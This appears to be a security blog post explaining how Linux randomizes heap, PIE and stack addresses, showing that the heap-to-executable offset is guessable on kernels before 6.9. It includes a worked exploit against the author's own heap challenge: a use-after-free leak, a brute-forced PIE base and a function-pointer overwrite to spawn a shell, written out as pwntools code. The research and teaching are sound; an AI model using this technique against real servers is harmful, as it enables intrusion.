This article took a while, so buckle up!

Address Space Layout Randomization

(not kASLR)

ASLR - the bane of arbitrary writes, and of most exploits which, well, require an address.

Luckily, we can defeat ASLR by leaking something. For example, by leaking the address of one libc function, you can calculate the location of any other libc global variable and function, in that process.
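For instance, converting a single leaked puts address into the address of system is pure arithmetic. The offsets below are made up for the sketch - on a real target you'd read them from that target's libc (e.g. with readelf -s libc.so.6):

```python
# HYPOTHETICAL numbers -- take the leak at runtime and read the offsets
# from your target's libc (`readelf -s libc.so.6`).
PUTS_OFFSET = 0x80ed0    # assumed static offset of puts within libc
SYSTEM_OFFSET = 0x50d70  # assumed static offset of system within libc

leaked_puts = 0x79993b480ed0           # a leaked runtime address of puts
libc_base = leaked_puts - PUTS_OFFSET  # subtract the static offset
assert libc_base & 0xfff == 0          # sanity: bases are page-aligned

system_addr = libc_base + SYSTEM_OFFSET
print(hex(system_addr))                # every libc symbol is now reachable
```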

And it affects everything - as long as it's supported, that is. If your target executable is built as PIE (libc, being a shared library, is always position-independent), you know none of the addresses in advance.

screenshot of /proc/PID/maps of a dynamically loaded process supporting PIE

And the worst part, they are all different! So we need a separate leak for each section!
Or do we?

Have you noticed something weird? libc.so.6, vvar, vdso and ld all have addresses that start with 0x79993b, while a.out and the heap start with 0x56568a.

Is it possible that it’s predictable??

Spoiler: it is.

ELF mapping

When you execute ./a.out, your shell executes a syscall to the kernel, specifically execve.

$ strace ./a.out
execve("./a.out", ["./a.out"], 0x7fff10a66ea0 /* 48 vars */) = 0
...

Eventually, the kernel parses the executable and starts to map it into memory. Because our executable supports PIE, the address at which it is loaded will be randomized. Randomized how?

It depends on what is being randomized.

The heap

An important thing to remember is that “the heap” is just an algorithm for managing contiguous memory. So what we really care about is how this contiguous memory is allocated.

Most malloc implementations, including glibc’s ptmalloc, use the brk syscall for this purpose, moving the program break up every time the wilderness (the topmost free chunk) gets too small.
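You can watch the program break move from userspace; a minimal sketch (assuming Linux with glibc) that calls sbrk through ctypes:

```python
import ctypes

libc = ctypes.CDLL(None)  # the libc already loaded into this process
libc.sbrk.restype = ctypes.c_void_p
libc.sbrk.argtypes = [ctypes.c_long]

before = libc.sbrk(0)   # sbrk(0) just reports the current program break
libc.sbrk(0x1000)       # ask the kernel to move the break up one page
after = libc.sbrk(0)

print(hex(before), hex(after))
assert after - before == 0x1000
```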

When the kernel loads an elf binary, using the function load_elf_binary, it, among other things, does the following:

mm->brk = mm->start_brk = arch_randomize_brk(mm);
current->brk_randomized = 1;

So the program break (i.e. where the heap starts) is being randomized.

Let’s check out arch_randomize_brk

unsigned long arch_randomize_brk(struct mm_struct *mm)
{
    if (mmap_is_ia32())
        return randomize_page(mm->brk, SZ_32M);

    return randomize_page(mm->brk, SZ_1G);
}

mm->brk? That’s where we finished loading the ELF!
What does randomize_page do?

unsigned long randomize_page(unsigned long start, unsigned long range)
{
    /* snip */

    range >>= PAGE_SHIFT;
    /* snip */

    return start + (get_random_long() % range << PAGE_SHIFT);
}

It moves the start address up by a random, page-aligned value in the range [0, range). Better yet, we now know that

  • On x86_64 the range is 1 GB, giving us 18 bits of randomness
  • On x86_32 the range is 32 MB, giving us 13 bits of randomness
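These bit counts fall directly out of the arithmetic in randomize_page; a quick sketch mirroring it:

```python
import math

PAGE_SHIFT = 12          # 4 KiB pages
SZ_32M = 32 * 1024**2
SZ_1G = 1024**3

def brk_entropy_bits(range_bytes: int) -> int:
    # randomize_page() picks a page index in [0, range >> PAGE_SHIFT),
    # so the entropy is log2 of that page count
    return int(math.log2(range_bytes >> PAGE_SHIFT))

print(brk_entropy_bits(SZ_1G))   # 18 on x86_64
print(brk_entropy_bits(SZ_32M))  # 13 on x86_32
```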

This means the ELF base is related to the heap base!!

BUT WAIT

This is the code in the latest Linux kernel to date, but servers aren’t running Arch, right?
Before Linux 6.9, arch_randomize_brk looked like this!

unsigned long arch_randomize_brk(struct mm_struct *mm)
{
    return randomize_page(mm->brk, 0x02000000);
}

(0x02000000 is 32MB, like the x86_32 on the latest kernel!)

And guess what kernel version Ubuntu and Debian have?

  • Ubuntu 24.04 LTS comes with Linux 6.8
  • Debian 12 Bookworm comes with Linux 6.1

BOTH ARE VULNERABLE!

Ok, back to what this means.

If you can only leak either a PIE or a heap address, you can brute force this randomness to convert PIE addresses to heap addresses, and vice versa.

Better yet, when working with an ELF that is not PIE, we already know the initial brk, so on any normal server we only have to guess out of 8192 options to get the heap base.

Of course, if the target server is running Linux 6.9 or above on x86_64, then you will have to guess out of ~262'000 options (2^18), which is still not that much.
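How bad is that to brute force? Each new connection spawns a freshly randomized process, so guessing a fixed value is a series of independent trials - a geometric distribution. A quick back-of-the-envelope:

```python
import math

def attempts_stats(n_options: int):
    # p = 1/n per guess; geometric distribution:
    # mean = n, median = ceil(-ln 2 / ln(1 - 1/n)) ~= n * ln 2
    p = 1 / n_options
    mean = 1 / p
    median = math.ceil(math.log(2) / -math.log(1 - p))
    return mean, median

print(attempts_stats(8192))     # 32 MB range: mean 8192, median ~5678
print(attempts_stats(1 << 18))  # 1 GB range: mean 262144, median ~181'700
```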

Demo

It’s not a technical post if I don’t show you some pretty pwned server screenshots, right?
So here you go

Obtaining shell by guessing ASLR

This is me pwning a simple heap chall I created, the gist of which is

switch (choice)
{
    case 1:
        if (!user)
        {
            user = malloc(sizeof(struct User));
            user->print = defaultPrint;
            user->uid = g_uid++;

            printf("username: ");
            read(0, user->name, sizeof(user->name));
        }
        break;

Mallocs a chunk and puts a function pointer in it. struct User and defaultPrint are

typedef void (*UserPrint)(struct User *user);

struct User
{
    char name[8];
    uint64_t uid;
    UserPrint print;
};

void defaultPrint(struct User *user)
{
    printf("%.8s\n", user->name);
}
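As a sanity check of the layout the exploit relies on, the same struct can be mirrored with Python's ctypes (assuming a 64-bit platform): name at offset 0, uid at 8, the function pointer at 16 - 24 bytes total, which malloc serves from the 0x20 tcache bin.

```python
import ctypes

class User(ctypes.Structure):
    # mirrors `struct User` from the challenge
    _fields_ = [
        ("name", ctypes.c_char * 8),
        ("uid", ctypes.c_uint64),
        ("print", ctypes.c_void_p),  # the UserPrint function pointer
    ]

assert ctypes.sizeof(User) == 24  # -> served from the 0x20 tcache bin
assert User.uid.offset == 8
assert User.print.offset == 16    # the offset we overwrite later
```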

Then there’s a basic UAF

    case 2:
        if (user)
        {
            printf("Cya!");
            free(user);
        }
        break;
    case 3:
        if (user)
        {
            user->print(user);
        }
        else
        {
            printf("login first\n");
        }
        break;

Which we can exploit by freeing user - putting the chunk into the tcache, which overwrites name with the (mangled) next pointer - and then calling print, which happily prints those bytes back, leaking the heap base.
Now how do we get RCE? The last menu option

    case 4:
    {
        const int password_length = 24;

        char *user_pass   = malloc(password_length);
        memset(user_pass, 0, password_length);
        read(0, user_pass, password_length);

        char *system_pass = malloc(password_length);
        memset(system_pass, 0, password_length);

        int fd = open("/dev/random", O_RDONLY);
        assert(fd >= 0);
        assert(read(fd, system_pass, password_length) == password_length);
        close(fd);

        if (memcmp(user_pass, system_pass, password_length) == 0)
        {
            user->uid = 0;
            user->print = adminPrint;
        }
        else
        {
            puts("Incorrect password. This incident will be reported.");
        }
        break;
    }
}

Because user was freed, its chunk will be reused for user_pass, hence allowing us to write an arbitrary pointer over .print and get RCE!

But what are we going to call?
After all, sure, we can leak a heap address, but we can’t execute the heap (NX), and we don’t know any addresses which are executable. ASLR strikes again.

Luckily, we now know that the exe base is only 13 (or 18) bits of randomness away from the heap base, so we can just guess where it is!

I spun up a Debian Bookworm box, the latest stable Debian version.
I ran my exploit 16 times, and measured how long it took me to get a shell.

Here are the results

Results of the bruteforce showing an average of 7893 attempts and a median of 4833 attempts

The solve script can be found here.

My idea is to first log in, and then immediately log out, putting the user chunk into the 0x20 tcache bin

login(b"abc")
logout()

Now we can leak the heap base by reading the protected (safe-linked) tcache next pointer, which in our case is exactly the heap base shifted right by 12 :D

heap_base = u64(whoami().ljust(8, b"\x00")) << 12

log.success(f"Heap base: {heap_base:#x}")
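Why the << 12? Since glibc 2.32 (safe-linking), tcache next pointers are stored mangled: PROTECT_PTR(pos, ptr) computes (pos >> 12) ^ ptr, where pos is the address the pointer is stored at. For the first chunk in a bin, next is NULL, so the stored value is just the chunk's address >> 12. A tiny model, with a made-up heap address:

```python
def protect_ptr(pos: int, ptr: int) -> int:
    # glibc's PROTECT_PTR macro from malloc.c
    return (pos >> 12) ^ ptr

heap_base = 0x56568a000000   # made up for the demo
chunk = heap_base + 0x2a0    # our freed `user` chunk, in the heap's first page

leak = protect_ptr(chunk, 0) # first chunk in the bin: next == NULL
assert leak == chunk >> 12
assert leak << 12 == heap_base  # works because the chunk sits below base+0x1000
```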

Now using what I found, we guess some offset from the base to the exe

EXE_BASE_TO_BSS_END_DIFF = 0x57520c251000 - 0x57520c24c000     # This is obtained from the real kernel-mapped pages
exe.address = heap_base - 0x1337000 - EXE_BASE_TO_BSS_END_DIFF # We can use any page aligned number up to 32MB :)

And finally we can overwrite the function pointer and the username with the PLT entry of system and /bin/sh respectively

sudo(fit({
    0: b"/bin/sh\x00",
    16: p64(exe.plt['system']),
}))

And execute

whoami(recv_leak=False)

And then, of course, we make sure to retry if the connection closes before we get a shell (meaning we guessed wrong). And, as the screenshot above shows, we get a shell on a modern x86_64 Debian system by guessing the PIE base, without ever leaking it.
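The whole retry strategy is easy to model in pure Python (numbers for the 32 MB, pre-6.9 case): pick one fixed guess and reconnect until a freshly randomized process happens to match it.

```python
import random

N = 8192          # 32 MiB of slide / 4 KiB pages
guess = 0x1337    # any fixed page index in [0, N)

attempts = 0
while True:
    attempts += 1
    # every reconnect spawns a fresh process with a fresh random slide
    if random.randrange(N) == guess:
        break

print(attempts)   # on average around 8192
```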


The stack

In fs/binfmt_elf.c, the Linux kernel executes the following function:

retval = setup_arg_pages(bprm, randomize_stack_top(STACK_TOP),
                 executable_stack);

It finalizes some things, but we are interested in where it relocates the stack.

  1. The basic

    • STACK_TOP is 0x7ffffffff000 on x86_64 and 0xC0000000 on x86_32
  2. The obvious
    What’s randomize_stack_top?

    unsigned long randomize_stack_top(unsigned long stack_top)
    {
        unsigned long random_variable = 0;
    
        if (current->flags & PF_RANDOMIZE) {     // true when stack ASLR is enabled
            random_variable = get_random_long(); // a random u64/u32 on x86_64/x86_32
            random_variable &= STACK_RND_MASK;   // `0x3fffff` on x86_64 and `0x7ff` on x86_32
        random_variable <<= PAGE_SHIFT;      // 12 for 4KB pages
        }
        return PAGE_ALIGN(stack_top) - random_variable;
    }
    

    So, an example return value could be

    • 0x7fffb98e1000 = 0x7ffffffff000 - 0x4671e000 on x86_64
    • 0xbfbd1000 = 0xC0000000 - 0x42f000 on x86_32

    And gives us a total of

    • 22 bits of randomness on x86_64
    • 11 bits of randomness on x86_32

    This is only 2048 options for x86_32!

  3. The hidden
    You didn’t think that was it, did you?
    setup_arg_pages does one more thing:

    stack_top = arch_align_stack(stack_top);
    stack_top = PAGE_ALIGN(stack_top);
    

    For some reason, arch_align_stack not only 16-byte-aligns the stack, but also adds 9 bits of randomness

    unsigned long arch_align_stack(unsigned long sp)
    {
        if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
            sp -= get_random_u32_below(8192);
        return sp & ~0xf;
    }
    

    Now you might have noticed that we page-align stack_top right after adding this randomness, cancelling most of it - and you would be right! It barely affects the page at which the stack is allocated. But something more sophisticated is going on here.

    If you ever tried to write to the stack using the address in procfs maps, you probably noticed that the offset changes every run! And rightfully so.

    After the Linux kernel copies your data onto the stack right at its top, it will eventually call create_elf_tables. And the first thing this function does is

    p = arch_align_stack(p);
    

    This time there is no PAGE_ALIGN to cancel it out. Just a raw 9 bits of random offset. Only after this will the kernel push the ELF auxiliary vector, envp and argv.

    Hexdump showing the randomized stack gap

Hence, we get 9 bits, aka 512 options, for the possible offset between the real base of the stack and the one used by our program.
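Putting the two sources together, the whole stack placement can be modeled in a few lines (constants for x86_64; this is a sketch of the kernel logic, not the real code):

```python
import random

PAGE_SHIFT = 12
STACK_TOP = 0x7ffffffff000
STACK_RND_MASK = 0x3FFFFF  # x86_64: 22 bits

def randomize_stack_top(stack_top: int) -> int:
    # page-granular randomness below STACK_TOP (stack_top is already aligned)
    rnd = (random.getrandbits(64) & STACK_RND_MASK) << PAGE_SHIFT
    return stack_top - rnd

def arch_align_stack(sp: int) -> int:
    # up to 8 KiB subtracted, then 16-byte aligned: ~512 distinct gaps
    sp -= random.randrange(8192)
    return sp & ~0xF

top = randomize_stack_top(STACK_TOP)  # where the stack VMA ends up
p = arch_align_stack(top)             # where auxv/envp/argv start being pushed

assert 0 <= top - p <= 8192 and p % 16 == 0
```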

You can even see it in action, by writing a C program like

#include <stdio.h>
#include <stdint.h>

int main(int argc, char *argv[])
{
    uint64_t stack_after_random_addr = (uint64_t)argv;
    uint64_t stack_before_random_addr = (uint64_t)argv[0];
    printf("%lu\n", stack_before_random_addr - stack_after_random_addr);
    return 0;
}

And then recording the output values

offsets = set()
i = 0
while True:
    io = start()
    offsets.add(io.recvline())
    io.close()
    print(f"[ {i} ] len(set)={len(offsets)}")
    i += 1

When running, you will see that as the len approaches 512, the rate at which it changes slows down, as expected. Eventually it gets to 512, and stays there.
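That behavior is exactly the coupon collector problem: observing all n = 512 equally likely offsets takes about n·H_n runs on average, so collecting the full set somewhere past 3'500 runs is expected.

```python
# Coupon collector: expected runs to see every one of n equally likely offsets
n = 512
harmonic = sum(1 / k for k in range(1, n + 1))  # the n-th harmonic number
expected_runs = n * harmonic

print(round(expected_runs))  # roughly 3.5k runs on average
```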

For example, I ran the loop over 10'000 times.

Results of running the script above, showing [ 10431 ] len(set)=512

This is why we can’t have nice stacks.